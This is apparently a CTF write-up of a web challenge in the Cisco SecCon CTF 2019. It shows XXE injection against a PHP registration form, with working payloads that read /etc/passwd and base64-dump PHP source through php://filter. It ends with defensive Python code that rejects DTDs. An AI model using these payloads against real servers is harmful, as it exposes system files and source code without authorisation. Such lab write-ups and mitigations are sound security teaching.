XXE Injection - Cisco SecCon CTF

September 30, 2019

I scored a total of 3000 points out of 4100 in the Cisco SecCon CTF 2019. There were a lot of interesting problems. Here, I am going to write about a web challenge called Autograph.

The first thing I saw on the website was a registration form. There was a script in the source code to package all the information and send it as XML. There was also a comment <!-- EVERYONE EXCEPT "ADMIN" CAN REGISTER FOR THE EVENT !-->.

After reading the comment, I tried setting the name field's value to admin and realized that, in order to get the email's value reflected back to the webpage, the name field had to have the value "admin".

For ANY value of email, it reflected back the email (saying that it already exists). I tried submitting the form on the webpage with some random values and intercepted the request through Burp. After seeing the XML in the request body, I thought of trying out an XXE payload.


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM "file:///etc/passwd">
]>
<root>
	<name>admin</name>
	<email>&bar;</email>
</root>

The payload worked, as the /etc/passwd contents were returned. Now I could browse around the server. After scratching my head for a while, I remembered that the XML data was being submitted to process.php (the same file the XML data is posted to).

I thought of viewing this file on the server, but when I tried to view it, I got the result of the PHP file executing and not the actual source code. In order to see the source code of the file, I used php://filter to convert it into base64 and then got the contents reflected into the response.


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM "php://filter/convert.base64-encode/resource=process.php">
]>
<root>
	<name>admin</name>
	<email>&bar;</email>
</root>

After getting the base64 encoded string, I decoded it and saw the contents of the process.php file. The first line contained an include to another file.

Using the same technique as before, I got the source of the newly found file which had the flag.

Flag: SecConCTF{HEY_I_THOUGHT_XML_WAS_SAFE:(}
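The fix on the server side is to never let a DTD through. As an added example (not code from the challenge or from the original post), here is a Python parser for the same registration document that aborts on the first DOCTYPE or entity declaration before anything can be expanded, so both payloads above (file:///etc/passwd and php://filter) are refused while a normal registration still parses. The element names root/name/email come from the write-up; the sample documents are constructed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DtdNotAllowed(ValueError):
    """Raised when incoming XML declares a DOCTYPE or any entity."""


def assert_no_dtd(xml_text: str) -> None:
    """Scan the document with expat and abort on the first DOCTYPE or
    entity declaration; this runs before any entity could be resolved."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdNotAllowed(f"entity {name!r} is not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_text, True)


def parse_registration(xml_text: str) -> dict:
    """Parse <root><name/><email/></root>, refusing anything with a DTD."""
    assert_no_dtd(xml_text)
    root = ET.fromstring(xml_text)
    return {field: (root.findtext(field) or "") for field in ("name", "email")}


def is_rejected(xml_text: str) -> bool:
    """True if the document is refused because it carries a DTD."""
    try:
        parse_registration(xml_text)
    except DtdNotAllowed:
        return True
    return False


# Constructed samples: a benign registration and the external-entity
# payload shape from the write-up (the SYSTEM target is irrelevant here,
# the DOCTYPE itself is what gets refused).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<root><name>alice</name><email>alice@example.com</email></root>"""

XXE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM "file:///etc/passwd">
]>
<root><name>admin</name><email>&bar;</email></root>"""
```

In PHP itself the equivalent is to parse with `LIBXML_NONET` and never pass `LIBXML_NOENT` or `LIBXML_DTDLOAD` to the libxml-based loaders.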